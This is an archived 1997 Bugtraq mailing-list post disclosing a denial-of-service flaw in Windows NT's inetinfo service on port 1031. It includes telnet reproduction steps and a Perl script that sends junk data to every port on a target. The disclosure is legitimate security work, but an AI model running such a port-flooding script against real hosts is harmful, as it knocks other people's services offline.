Bugtraq mailing list archives
[NTSEC] NT vulnerable to DOS attack on more than just port 135
From: cklaus () iss net (Bob Beck)
Date: Sat, 25 Jan 1997 12:06:11 -0600
Looks like NT is also vulnerable to exactly the same attack as previously posted WRT connecting and throwing garbage at port 135 on another port, namely 1031 (inetinfo) The inetinfo.exe process goes insane on NT4.0. Haven't tested on 3.51. To try, telnet to 1031 on an NT machine and type garbage, then disconnect. Below is what me and Chris Bayly (Chris.Bayly () ualberta ca) rigged up to check. -Bob --------------------------------------------------------------------------- Bob Beck Obtuse Systems Corporation beck () obtuse com http://www.obtuse.com/ True Evil hides its real intentions in its street address. Search and you shall find it, and the truth shall set you free. ------------------------------8<---------------------------------- #!/usr/local/bin/perl use Socket; use FileHandle; require "chat2.pl"; $ILoveBill = $ARGV[0] && shift; $verbose = 0; # tell me what you're hitting $knownports = 0; # don't hit known problem ports for ($port = $0; $port<65535; $port++) { if ($knownports && ($port == 135 || $port== 1031)) { next; } $fh = chat::open_port($ILoveBill, $port); chat::print ($fh,"Windows NT is the platform of the future"); if ($verbose) { print "Trying port: $port\n\n"; } chat::close($fh); }
Current thread:
- NT RPC Hotfix Aleph One (Jan 23)
- Re: NT RPC Hotfix dsiebert () icaen uiowa edu (Jan 23)
- AOL client port and possible security risk. Sami A. Yousif (Jan 23)
- Re: NT RPC Hotfix Darren Reed (Jan 24)
- <Possible follow-ups>
- Re: NT RPC Hotfix Brad.Powell (Jan 24)
- Re: NT RPC Hotfix Yuri Volobuev (Jan 24)
- GNU tar vulnerability Ben Elliston (Jan 24)
- [NTSEC] NT vulnerable to DOS attack on more than just port 135 Bob Beck (Jan 25)